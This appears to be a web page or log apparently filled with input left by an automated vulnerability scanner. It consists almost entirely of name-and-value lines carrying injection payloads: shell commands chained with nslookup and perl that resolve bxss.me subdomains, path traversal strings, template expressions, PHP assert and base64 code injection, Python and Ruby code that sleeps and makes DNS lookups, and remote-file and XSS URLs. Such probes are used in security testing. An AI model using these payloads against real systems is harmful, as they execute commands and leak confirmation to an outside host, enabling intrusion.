ORndYuka : `(nslookup hitebqycmkbqw345d5.bxss.me||perl -e "gethostbyname('hitebqycmkbqw345d5.bxss.me')")` .
../../../../../../.. : 1 .
ORndYuka : 1 .
../../../../../../.. : 1 .
ORndYuka : 1 .
ORndYuka : ;(nslookup hitcawevrffjna6f56.bxss.me||perl -e "gethostbyname('hitcawevrffjna6f56.bxss.me')")|(nslookup hitcawevrffjna6f56.bxss.me||perl -e "gethostbyname('hitcawevrffjna6f56.bxss.me')")&(nslookup hitcawevrffjna6f56.bxss.me||perl -e "gethostbyname('hitcawevrffjna6f56.bxss.me')") .
ORndYuka : 1 .
echo tignpq$()\ ephx : 1 .
../ORndYuka : 1 .
&echo mqexil$()\ vgk : 1 .
ORndYuka : 1 .
ORndYuka : .
|echo csrwpf$()\ wyy : 1 .
ORndYuka : 1 .
(nslookup hitgoaiich : 1 .
ORndYuka : 12345'"\'\");|]*{ <>�''�뮕 .
ORndYuka : 1 .
$(nslookup hitrgcfaa : 1 .
ORndYuka : Array .
ORndYuka : 1 .
: 1 .
&(nslookup hitreilem : 1 .
12345'"\'\");|]*{ : 1 .
|(nslookup hitayjaip : 1 .
`(nslookup hittxkcgk : 1 .
Array : 1 .
ORndYuka : 1 .
;(nslookup hitpyzlag : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka.
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : ${9999939+9999547} .
ORndYuka : 1 .
${10000255+9999145} : 1 .
ORndYuka : 1 .
ORndYuka : http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1some_inexistent_file_with_long_name.jpg .
Um5FQkpya2Q= : 1 .
ORndYuka : Http://bxss.me/t/fit.txt .
ORndYuka : 1&n946700=v911241 .
ORndYuka : ) .
ORndYuka : 1 .
ORndYuka : http://bxss.me/t/fit.txt?.jpg .
ORndYuka : !(()&&!|*|*| .
ORndYuka : bxss.me .
ORndYuka&n993158=v96 : 1 .
ORndYuka : ^(#$!@#$)(()))****** .
ORndYuka : 1 .
http://some-inexiste : 1 .
ORndYuka : 1 .
) : 1 .
!(()&&!|*|*| : 1 .
1some_inexistent_fil : 1 .
ORndYuka : Array .
^(#$!@#$)(()))****** : 1 .
Http://bxss.me/t/fit : 1 .
ORndYuka : '"() .
ORndYuka : 1 .
http://bxss.me/t/fit : 1 .
Array : 1 .
ORndYuka : 1 .
bxss.me : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
'"() : 1 .
ORndYuka : 1 .
ORndYuka : '.gethostbyname(lc('hitug'.'treiuyjx3838e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(69).chr(108).chr(74).' .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : ".gethostbyname(lc("hitzk"."zmhlwgmo6233d.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(90).chr(97).chr(80)." .
ORndYuka : 1 .
'.gethostbyname(lc(' : 1 .
ORndYuka : ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); .
ORndYuka : ';print(md5(31337));$a=' .
".gethostbyname(lc(" : 1 .
ORndYuka : str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitfackyejtcy14c66.'+'bxss.me') .
ORndYuka : ";print(md5(31337));$a=" .
ORndYuka : '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitfackyejtcy14c66."+"bxss.me")+' .
ORndYuka : 1 .
ORndYuka : ${@print(md5(31337))} .
ORndYuka : "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitfackyejtcy14c66.'+'bxss.me')+" .
ORndYuka : HttP://bxss.me/t/xss.html?%00 .
ORndYuka : bxss.me/t/xss.html?%00 .
ORndYuka : ${@print(md5(31337))}\ .
str(__import__('time : 1 .
HttP://bxss.me/t/xss : 1 .
ORndYuka : '.print(md5(31337)).' .
ORndYuka : 1 .
'+str(__import__("ti : 1 .
bxss.me/t/xss.html?% : 1 .
;assert(base64_decod : 1 .
"+str(__import__('ti : 1 .
ORndYuka : 1 .
';print(md5(31337)); : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
";print(md5(31337)); : 1 .
ORndYuka : 1 .
${@print(md5(31337)) : 1 .
ORndYuka : "+"A".concat(70-3).concat(22*4).concat(112).concat(71).concat(112).concat(69)+(require"socket" Socket.gethostbyname("hitre"+"gabanwnma792b.bxss.me.")[3].to_s)+" .
ORndYuka : 1 .
ORndYuka : '+'A'.concat(70-3).concat(22*4).concat(117).concat(78).concat(105).concat(90)+(require'socket' Socket.gethostbyname('hitxx'+'tkdeamuh0292e.bxss.me.')[3].to_s)+' .
ORndYuka : insert_comment.php3 .
${@print(md5(31337)) : 1 .
"+"A".concat(70-3).c : 1 .
ORndYuka : insert_comment.php3 .
'.print(md5(31337)). : 1 .
'+'A'.concat(70-3).c : 1 .
ORndYuka : 1 .
ORndYuka : insert_comment.php3/. .
ORndYuka : ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) .
ORndYuka : 1 .
insert_comment.php3 : 1 .
ORndYuka : http://hitngvubotxbl.bxss.me/ .
ORndYuka : 1 .
)))))))))))))))))))) : 1 .
insert_comment.php3 : 1 .
ORndYuka : 1 .
http://hitkgcaaxbtab : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
insert_comment.php3/ : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : /xfs.bxss.me .
ORndYuka : 1 .
/xfs.bxss.me : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : '" .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka :